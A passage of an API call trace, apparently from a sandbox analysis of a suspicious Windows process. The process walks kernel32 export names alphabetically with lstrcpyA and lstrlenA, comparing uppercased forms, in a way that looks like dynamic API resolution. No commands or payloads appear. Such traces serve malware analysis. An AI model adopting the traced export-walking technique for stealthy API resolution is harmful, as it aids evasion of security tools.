returned="CloseThreadpool" [0084.293] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0084.293] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0084.293] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0084.294] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0084.294] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0084.294] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0084.294] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0084.294] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0084.294] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0084.294] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0084.294] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0084.294] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0084.294] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0084.294] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0084.294] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0084.294] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0084.294] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0084.294] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0084.294] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0084.294] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0084.294] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0084.294] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0084.295] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0084.295] lstrlenA (lpString="COPYCONTEXT") returned 11 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0084.295] lstrlenA (lpString="COPYFILEA") returned 9 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0084.295] lstrlenA (lpString="COPYFILEEXA") returned 11 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0084.295] lstrlenA (lpString="COPYFILEEXW") returned 11 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0084.295] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0084.295] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0084.295] lstrlenA (lpString="COPYFILEW") returned 9 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0084.295] lstrlenA (lpString="COPYLZFILE") returned 10 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0084.295] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0084.295] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0084.295] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0084.295] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0084.295] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.295] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.295] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.295] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.295] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.295] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.296] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.296] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.296] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.296] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.296] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.296] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.296] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.296] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.296] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.296] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.296] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.296] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.296] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.296] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.296] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.296] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.296] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.296] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.296] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.297] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.297] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.297] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.297] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.297] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.297] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.297] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.297] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.297] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.297] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.297] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.297] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.297] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.297] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.297] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.297] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.297] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.297] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.297] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.297] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.298] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.298] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.298] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.298] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.298] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.298] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.298] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.298] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.298] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.298] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.298] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.298] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.298] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.298] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.298] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.298] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.298] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.298] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.298] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.299] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.299] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.299] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.299] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.299] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.299] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.299] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.299] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.299] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.299] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.299] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.299] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.299] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.300] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.300] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.300] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.300] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.300] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.300] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.300] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.300] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.300] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.300] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.300] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.300] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.300] lstrlenA (lpString="DELETEATOM") returned 10 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.300] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.300] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.300] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.300] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.300] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.300] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.301] 